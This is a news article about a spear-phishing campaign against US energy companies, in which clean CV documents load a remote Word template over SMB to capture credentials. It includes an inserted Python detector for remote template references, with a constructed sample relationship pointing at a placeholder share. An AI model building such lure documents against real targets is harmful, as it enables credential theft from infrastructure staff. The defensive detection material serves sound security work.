A new cyber-attack vector against energy companies has reared its head, with the potential to cause power cuts, disrupt vital facilities and even cost lives.
In the attacks so far picked up by Israel-based cybersecurity company CyberInt, a “lure” document masquerades as a curriculum vitae accompanying a harmless email. What makes this latest type of spear-phishing attack hard for the energy companies to identify is that the lure email and attached Word document are totally clean and contain no malicious code whatsoever. They are therefore undetectable to incoming email monitoring defenses.
Instead, the weaponized Word document contains a template reference that, when the document is loaded, connects to an attacker’s server via Server Message Block (SMB) to download a Word template which can include embedded malicious payloads.
The connection to the SMB server also provides the attacker with the victim’s credentials, which can subsequently be used to acquire sensitive information and/or infiltrate the control systems used by the targeted personnel.
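A detection-side check for the mechanism described above, added here as an example and not code from the article or from CyberInt: it opens a .docx as the zip container it is and flags any attachedTemplate relationship whose external target points at another host, which is what would trigger the SMB fetch. The hostname, share and file names in the sample are constructed placeholders.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
# Targets Word would fetch from another host: UNC paths (\\host\share, //host/share),
# file://host/... and http(s). A local file:///C:/... template is not flagged.
REMOTE_TARGET = re.compile(r"^(\\\\|//|file://[^/]|https?://)", re.IGNORECASE)


def remote_templates(docx_bytes):
    """Return (rels part, target) pairs for every attachedTemplate that points off-host."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") != ATTACHED_TEMPLATE:
                    continue
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and REMOTE_TARGET.match(target):
                    hits.append((name, target))
    return hits


def build_docx(rels_xml):
    """Constructed minimal .docx holding only the parts the check reads (not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/settings.xml", "<settings/>")
        z.writestr("word/_rels/settings.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed sample relationships: one pointing at a hypothetical remote share,
# one at the user's ordinary local Normal.dotm (should not be flagged).
MALICIOUS_RELS = f'''<Relationships xmlns="{REL_NS}"><Relationship Id="rId1"
 Type="{ATTACHED_TEMPLATE}" Target="\\\\template-host.example\\share\\cv.dotm"
 TargetMode="External"/></Relationships>'''
BENIGN_RELS = f'''<Relationships xmlns="{REL_NS}"><Relationship Id="rId1"
 Type="{ATTACHED_TEMPLATE}" TargetMode="External"
 Target="file:///C:/Users/user/AppData/Roaming/Microsoft/Templates/Normal.dotm"/></Relationships>'''

if __name__ == "__main__":
    print(remote_templates(build_docx(MALICIOUS_RELS)))  # one hit
    print(remote_templates(build_docx(BENIGN_RELS)))     # []
```

Because the document carries no macro or payload, this relationship entry is the only static artefact a mail gateway can key on; blocking outbound SMB at the perimeter covers the case where the document is opened anyway.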
The campaign appears to have been taking place since May and has initially been directed at infrastructure control systems (ICS) of US energy companies. Yet, the threat now has the potential to spread to vital infrastructure in Britain.
Although the perpetrators of the new attacks remain unknown, CyberInt said that they share many traits with the 2014 Dragonfly (aka Energetic Bear) campaign, an advanced persistent threat (APT) possibly attributed to a Russian threat actor, targeting critical infrastructure such as electrical utilities outside Russia.
Attacks targeting energy companies’ control systems and infrastructure are becoming an alarming issue worldwide, from the infamous Stuxnet malware discovered in 2010, designed to wreak havoc in Iran’s SCADA systems, to the year-long campaign against Israel Electric Company. Nuclear facilities around the world are also being infected with malware. This is in addition to the long-running campaign targeting Ukraine, which caused widespread power outages in 2015 and 2016.
“Owing to the international nature of cybercrime and cyber-terrorism, UK energy companies should take immediate steps to protect themselves against these attacks as standard monitoring and filtering of incoming emails will be ineffective if this campaign starts to spread outside the US,” said Elad Ben-Meir, CyberInt vice-president of marketing.